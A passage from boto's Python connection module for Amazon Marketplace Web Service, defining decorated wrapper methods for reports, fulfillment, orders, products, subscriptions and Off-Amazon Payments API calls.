the value of HasNext was true in that previous request.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type',
'ReportProcessingStatusList.Status')
@api_action('Reports', 10, 45)
def get_report_request_count(self, request, response, **kw):
"""Returns a count of report requests that have been submitted
to Amazon MWS for processing.
"""
return self._post_request(request, kw, response)
@api_action('Reports', 10, 45)
def cancel_report_requests(self, request, response, **kw):
"""Cancel one or more report requests, returning the count of the
canceled report requests and the report request information.
"""
return self._post_request(request, kw, response)
@boolean_arguments('Acknowledged')
@structured_lists('ReportRequestIdList.Id', 'ReportTypeList.Type')
@api_action('Reports', 10, 60)
def get_report_list(self, request, response, **kw):
"""Returns a list of reports that were created in the previous
90 days that match the query parameters.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_list_by_next_token(self, request, response, **kw):
"""Returns a list of reports using the NextToken, which
was supplied by a previous request to either
GetReportListByNextToken or GetReportList, where the
value of HasNext was true in the previous call.
"""
return self._post_request(request, kw, response)
@boolean_arguments('Acknowledged')
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_count(self, request, response, **kw):
"""Returns a count of the reports, created in the previous 90 days,
with a status of _DONE_ and that are available for download.
"""
return self._post_request(request, kw, response)
@requires(['ReportId'])
@api_action('Reports', 15, 60)
def get_report(self, request, response, **kw):
"""Returns the contents of a report.
"""
return self._post_request(request, kw, response)
@requires(['ReportType', 'Schedule'])
@api_action('Reports', 10, 45)
def manage_report_schedule(self, request, response, **kw):
"""Creates, updates, or deletes a report request schedule for
a specified report type.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_schedule_list(self, request, response, **kw):
"""Returns a list of order report requests that are scheduled
to be submitted to Amazon MWS for processing.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Reports', 0, 0)
def get_report_schedule_list_by_next_token(self, request, response, **kw):
"""Returns a list of report requests using the NextToken,
which was supplied by a previous request to either
GetReportScheduleListByNextToken or GetReportScheduleList,
where the value of HasNext was true in that previous request.
"""
return self._post_request(request, kw, response)
@structured_lists('ReportTypeList.Type')
@api_action('Reports', 10, 45)
def get_report_schedule_count(self, request, response, **kw):
"""Returns a count of order report requests that are scheduled
to be submitted to Amazon MWS.
"""
return self._post_request(request, kw, response)
@requires(['ReportIdList'])
@boolean_arguments('Acknowledged')
@structured_lists('ReportIdList.Id')
@api_action('Reports', 10, 45)
def update_report_acknowledgements(self, request, response, **kw):
"""Updates the acknowledged status of one or more reports.
"""
return self._post_request(request, kw, response)
@requires(['ShipFromAddress', 'InboundShipmentPlanRequestItems'])
@structured_objects('ShipFromAddress', 'InboundShipmentPlanRequestItems')
@api_action('Inbound', 30, 0.5)
def create_inbound_shipment_plan(self, request, response, **kw):
"""Returns the information required to create an inbound shipment.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId', 'InboundShipmentHeader', 'InboundShipmentItems'])
@structured_objects('InboundShipmentHeader', 'InboundShipmentItems')
@api_action('Inbound', 30, 0.5)
def create_inbound_shipment(self, request, response, **kw):
"""Creates an inbound shipment.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId'])
@structured_objects('InboundShipmentHeader', 'InboundShipmentItems')
@api_action('Inbound', 30, 0.5)
def update_inbound_shipment(self, request, response, **kw):
"""Updates an existing inbound shipment. Amazon documentation
is ambiguous as to whether the InboundShipmentHeader and
InboundShipmentItems arguments are required.
"""
return self._post_request(request, kw, response)
@requires_some_of('ShipmentIdList', 'ShipmentStatusList')
@structured_lists('ShipmentIdList.Id', 'ShipmentStatusList.Status')
@api_action('Inbound', 30, 0.5)
def list_inbound_shipments(self, request, response, **kw):
"""Returns a list of inbound shipments based on criteria that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipments_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipments using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@requires(['ShipmentId'], ['LastUpdatedAfter', 'LastUpdatedBefore'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipment_items(self, request, response, **kw):
"""Returns a list of items in a specified inbound shipment, or a
list of items that were updated within a specified time frame.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inbound', 30, 0.5)
def list_inbound_shipment_items_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipment items using the
NextToken parameter.
"""
return self._post_request(request, kw, response)
@api_action('Inbound', 2, 300, 'GetServiceStatus')
def get_inbound_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Inbound
Shipment API section.
"""
return self._post_request(request, kw, response)
@requires(['SellerSkus'], ['QueryStartDateTime'])
@structured_lists('SellerSkus.member')
@api_action('Inventory', 30, 0.5)
def list_inventory_supply(self, request, response, **kw):
"""Returns information about the availability of a seller's
inventory.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Inventory', 30, 0.5)
def list_inventory_supply_by_next_token(self, request, response, **kw):
"""Returns the next page of information about the availability
of a seller's inventory using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@api_action('Inventory', 2, 300, 'GetServiceStatus')
def get_inventory_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Inventory
API section.
"""
return self._post_request(request, kw, response)
@requires(['PackageNumber'])
@api_action('Outbound', 30, 0.5)
def get_package_tracking_details(self, request, response, **kw):
"""Returns delivery tracking information for a package in
an outbound shipment for a Multi-Channel Fulfillment order.
"""
return self._post_request(request, kw, response)
@requires(['Address', 'Items'])
@structured_objects('Address', 'Items')
@api_action('Outbound', 30, 0.5)
def get_fulfillment_preview(self, request, response, **kw):
"""Returns a list of fulfillment order previews based on items
and shipping speed categories that you specify.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId', 'DisplayableOrderId',
'ShippingSpeedCategory', 'DisplayableOrderDateTime',
'DestinationAddress', 'DisplayableOrderComment',
'Items'])
@structured_objects('DestinationAddress', 'Items')
@api_action('Outbound', 30, 0.5)
def create_fulfillment_order(self, request, response, **kw):
"""Requests that Amazon ship items from the seller's inventory
to a destination address.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId'])
@api_action('Outbound', 30, 0.5)
def get_fulfillment_order(self, request, response, **kw):
"""Returns a fulfillment order based on a specified
SellerFulfillmentOrderId.
"""
return self._post_request(request, kw, response)
@api_action('Outbound', 30, 0.5)
def list_all_fulfillment_orders(self, request, response, **kw):
"""Returns a list of fulfillment orders fulfilled after (or
at) a specified date or by fulfillment method.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Outbound', 30, 0.5)
def list_all_fulfillment_orders_by_next_token(self, request, response, **kw):
"""Returns the next page of inbound shipment items using the
NextToken parameter.
"""
return self._post_request(request, kw, response)
@requires(['SellerFulfillmentOrderId'])
@api_action('Outbound', 30, 0.5)
def cancel_fulfillment_order(self, request, response, **kw):
"""Requests that Amazon stop attempting to fulfill an existing
fulfillment order.
"""
return self._post_request(request, kw, response)
@api_action('Outbound', 2, 300, 'GetServiceStatus')
def get_outbound_service_status(self, request, response, **kw):
"""Returns the operational status of the Fulfillment Outbound
API section.
"""
return self._post_request(request, kw, response)
@requires(['CreatedAfter'], ['LastUpdatedAfter'])
@requires(['MarketplaceId'])
@exclusive(['CreatedAfter'], ['LastUpdatedAfter'])
@dependent('CreatedBefore', ['CreatedAfter'])
@exclusive(['LastUpdatedAfter'], ['BuyerEmail'], ['SellerOrderId'])
@dependent('LastUpdatedBefore', ['LastUpdatedAfter'])
@exclusive(['CreatedAfter'], ['LastUpdatedBefore'])
@structured_objects('OrderTotal', 'ShippingAddress',
'PaymentExecutionDetail')
@structured_lists('MarketplaceId.Id', 'OrderStatus.Status',
'FulfillmentChannel.Channel', 'PaymentMethod.')
@api_action('Orders', 6, 60)
def list_orders(self, request, response, **kw):
"""Returns a list of orders created or updated during a time
frame that you specify.
"""
toggle = set(('FulfillmentChannel.Channel.1',
'OrderStatus.Status.1', 'PaymentMethod.1',
'LastUpdatedAfter', 'LastUpdatedBefore'))
for do, dont in {
'BuyerEmail': toggle.union(['SellerOrderId']),
'SellerOrderId': toggle.union(['BuyerEmail']),
}.items():
if do in kw and any(i in dont for i in kw):
message = "Don't include {0} when specifying " \
"{1}".format(' or '.join(dont), do)
raise AssertionError(message)
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Orders', 6, 60)
def list_orders_by_next_token(self, request, response, **kw):
"""Returns the next page of orders using the NextToken value
that was returned by your previous request to either
ListOrders or ListOrdersByNextToken.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderId'])
@structured_lists('AmazonOrderId.Id')
@api_action('Orders', 6, 60)
def get_order(self, request, response, **kw):
"""Returns an order for each AmazonOrderId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderId'])
@api_action('Orders', 30, 2)
def list_order_items(self, request, response, **kw):
"""Returns order item information for an AmazonOrderId that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Orders', 30, 2)
def list_order_items_by_next_token(self, request, response, **kw):
"""Returns the next page of order items using the NextToken
value that was returned by your previous request to either
ListOrderItems or ListOrderItemsByNextToken.
"""
return self._post_request(request, kw, response)
@api_action('Orders', 2, 300, 'GetServiceStatus')
def get_orders_service_status(self, request, response, **kw):
"""Returns the operational status of the Orders API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Query'])
@api_action('Products', 20, 20)
def list_matching_products(self, request, response, **kw):
"""Returns a list of products and their attributes, ordered
by relevancy, based on a search query that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 20)
def get_matching_product(self, request, response, **kw):
"""Returns a list of products and their attributes, based on
a list of ASIN values that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'IdType', 'IdList'])
@structured_lists('IdList.Id')
@api_action('Products', 20, 20)
def get_matching_product_for_id(self, request, response, **kw):
"""Returns a list of products and their attributes, based on
a list of Product IDs that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 10, 'GetCompetitivePricingForSKU')
def get_competitive_pricing_for_sku(self, request, response, **kw):
"""Returns the current competitive pricing of a product,
based on the SellerSKUs and MarketplaceId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 10, 'GetCompetitivePricingForASIN')
def get_competitive_pricing_for_asin(self, request, response, **kw):
"""Returns the current competitive pricing of a product,
based on the ASINs and MarketplaceId that you specify.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 5, 'GetLowestOfferListingsForSKU')
def get_lowest_offer_listings_for_sku(self, request, response, **kw):
"""Returns the lowest price offer listings for a specific
product by item condition and SellerSKUs.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 5, 'GetLowestOfferListingsForASIN')
def get_lowest_offer_listings_for_asin(self, request, response, **kw):
"""Returns the lowest price offer listings for a specific
product by item condition and ASINs.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKU'])
@api_action('Products', 20, 20, 'GetProductCategoriesForSKU')
def get_product_categories_for_sku(self, request, response, **kw):
"""Returns the product categories that a SellerSKU belongs to.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASIN'])
@api_action('Products', 20, 20, 'GetProductCategoriesForASIN')
def get_product_categories_for_asin(self, request, response, **kw):
"""Returns the product categories that an ASIN belongs to.
"""
return self._post_request(request, kw, response)
@api_action('Products', 2, 300, 'GetServiceStatus')
def get_products_service_status(self, request, response, **kw):
"""Returns the operational status of the Products API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'SellerSKUList'])
@structured_lists('SellerSKUList.SellerSKU')
@api_action('Products', 20, 10, 'GetMyPriceForSKU')
def get_my_price_for_sku(self, request, response, **kw):
"""Returns pricing information for your own offer listings, based on SellerSKU.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'ASINList'])
@structured_lists('ASINList.ASIN')
@api_action('Products', 20, 10, 'GetMyPriceForASIN')
def get_my_price_for_asin(self, request, response, **kw):
"""Returns pricing information for your own offer listings, based on ASIN.
"""
return self._post_request(request, kw, response)
@api_action('Sellers', 15, 60)
def list_marketplace_participations(self, request, response, **kw):
"""Returns a list of marketplaces that the seller submitting
the request can sell in, and a list of participations that
include seller-specific information in that marketplace.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Sellers', 15, 60)
def list_marketplace_participations_by_next_token(self, request, response,
**kw):
"""Returns the next page of marketplaces and participations
using the NextToken value that was returned by your
previous request to either ListMarketplaceParticipations
or ListMarketplaceParticipationsByNextToken.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Recommendations', 5, 2)
def get_last_updated_time_for_recommendations(self, request, response,
**kw):
"""Checks whether there are active recommendations for each category
for the given marketplace, and if there are, returns the time when
recommendations were last updated for each category.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@structured_lists('CategoryQueryList.CategoryQuery')
@api_action('Recommendations', 5, 2)
def list_recommendations(self, request, response, **kw):
"""Returns your active recommendations for a specific category or for
all categories for a specific marketplace.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('Recommendations', 5, 2)
def list_recommendations_by_next_token(self, request, response, **kw):
"""Returns the next page of recommendations using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@api_action('Recommendations', 2, 300, 'GetServiceStatus')
def get_recommendations_service_status(self, request, response, **kw):
"""Returns the operational status of the Recommendations API section.
"""
return self._post_request(request, kw, response)
@api_action('CustomerInfo', 15, 12)
def list_customers(self, request, response, **kw):
"""Returns a list of customer accounts based on search criteria that
you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('CustomerInfo', 50, 3)
def list_customers_by_next_token(self, request, response, **kw):
"""Returns the next page of customers using the NextToken parameter.
"""
return self._post_request(request, kw, response)
@requires(['CustomerIdList'])
@structured_lists('CustomerIdList.CustomerId')
@api_action('CustomerInfo', 15, 12)
def get_customers_for_customer_id(self, request, response, **kw):
"""Returns a list of customer accounts based on search criteria that
you specify.
"""
return self._post_request(request, kw, response)
@api_action('CustomerInfo', 2, 300, 'GetServiceStatus')
def get_customerinfo_service_status(self, request, response, **kw):
"""Returns the operational status of the Customer Information API
section.
"""
return self._post_request(request, kw, response)
@requires(['DateRangeStart'])
@api_action('CartInfo', 15, 12)
def list_carts(self, request, response, **kw):
"""Returns a list of shopping carts in your Webstore that were last
updated during the time range that you specify.
"""
return self._post_request(request, kw, response)
@requires(['NextToken'])
@api_action('CartInfo', 50, 3)
def list_carts_by_next_token(self, request, response, **kw):
"""Returns the next page of shopping carts using the NextToken
parameter.
"""
return self._post_request(request, kw, response)
@requires(['CartIdList'])
@structured_lists('CartIdList.CartId')
@api_action('CartInfo', 15, 12)
def get_carts(self, request, response, **kw):
"""Returns shopping carts based on the CartId values that you specify.
"""
return self._post_request(request, kw, response)
@api_action('CartInfo', 2, 300, 'GetServiceStatus')
def get_cartinfo_service_status(self, request, response, **kw):
"""Returns the operational status of the Cart Information API section.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def register_destination(self, request, response, **kw):
"""Specifies a new destination where you want to receive notifications.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def deregister_destination(self, request, response, **kw):
"""Removes an existing destination from the list of registered
destinations.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Subscriptions', 25, 0.5)
def list_registered_destinations(self, request, response, **kw):
"""Lists all current destinations that you have registered.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def send_test_notification_to_destination(self, request, response, **kw):
"""Sends a test notification to an existing destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Subscription'])
@structured_objects('Subscription', members=True)
@api_action('Subscriptions', 25, 0.5)
def create_subscription(self, request, response, **kw):
"""Creates a new subscription for the specified notification type
and destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'NotificationType', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def get_subscription(self, request, response, **kw):
"""Gets the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'NotificationType', 'Destination'])
@structured_objects('Destination', members=True)
@api_action('Subscriptions', 25, 0.5)
def delete_subscription(self, request, response, **kw):
"""Deletes the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId'])
@api_action('Subscriptions', 25, 0.5)
def list_subscriptions(self, request, response, **kw):
"""Returns a list of all your current subscriptions.
"""
return self._post_request(request, kw, response)
@requires(['MarketplaceId', 'Subscription'])
@structured_objects('Subscription', members=True)
@api_action('Subscriptions', 25, 0.5)
def update_subscription(self, request, response, **kw):
"""Updates the subscription for the specified notification type and
destination.
"""
return self._post_request(request, kw, response)
@api_action('Subscriptions', 2, 300, 'GetServiceStatus')
def get_subscriptions_service_status(self, request, response, **kw):
"""Returns the operational status of the Subscriptions API section.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId', 'OrderReferenceAttributes'])
@structured_objects('OrderReferenceAttributes')
@api_action('OffAmazonPayments', 10, 1)
def set_order_reference_details(self, request, response, **kw):
"""Sets order reference details such as the order total and a
description for the order.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 20, 2)
def get_order_reference_details(self, request, response, **kw):
"""Returns details about the Order Reference object and its current
state.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def confirm_order_reference(self, request, response, **kw):
"""Confirms that the order reference is free of constraints and all
required information has been set on the order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def cancel_order_reference(self, request, response, **kw):
"""Cancel an order reference; all authorizations associated with
this order reference are also closed.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId'])
@api_action('OffAmazonPayments', 10, 1)
def close_order_reference(self, request, response, **kw):
"""Confirms that an order reference has been fulfilled (fully
or partially) and that you do not expect to create any new
authorizations on this order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonOrderReferenceId', 'AuthorizationReferenceId',
'AuthorizationAmount'])
@structured_objects('AuthorizationAmount')
@api_action('OffAmazonPayments', 10, 1)
def authorize(self, request, response, **kw):
"""Reserves a specified amount against the payment method(s) stored in
the order reference.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId'])
@api_action('OffAmazonPayments', 20, 2)
def get_authorization_details(self, request, response, **kw):
"""Returns the status of a particular authorization and the total
amount captured on the authorization.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId', 'CaptureReferenceId', 'CaptureAmount'])
@structured_objects('CaptureAmount')
@api_action('OffAmazonPayments', 10, 1)
def capture(self, request, response, **kw):
"""Captures funds from an authorized payment instrument.
"""
return self._post_request(request, kw, response)
@requires(['AmazonCaptureId'])
@api_action('OffAmazonPayments', 20, 2)
def get_capture_details(self, request, response, **kw):
"""Returns the status of a particular capture and the total amount
refunded on the capture.
"""
return self._post_request(request, kw, response)
@requires(['AmazonAuthorizationId'])
@api_action('OffAmazonPayments', 10, 1)
def close_authorization(self, request, response, **kw):
"""Closes an authorization.
"""
return self._post_request(request, kw, response)
@requires(['AmazonCaptureId', 'RefundReferenceId', 'RefundAmount'])
@structured_objects('RefundAmount')
@api_action('OffAmazonPayments', 10, 1)
def refund(self, request, response, **kw):
"""Refunds a previously captured amount.
"""
return self._post_request(request, kw, response)
@requires(['AmazonRefundId'])
@api_action('OffAmazonPayments', 20, 2)
def get_refund_details(self, request, response, **kw):
"""Returns the status of a particular refund.
"""
return self._post_request(request, kw, response)
@api_action('OffAmazonPayments', 2, 300, 'GetServiceStatus')
def get_offamazonpayments_service_status(self, request, response, **kw):
"""Returns the operational status of the Off-Amazon Payments API
section.
"""
return self._post_request(request, kw, response)
| GbalsaC/bitnamiP | venv/lib/python2.7/site-packages/boto/mws/connection.py | Python | agpl-3.0 | 49,807 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.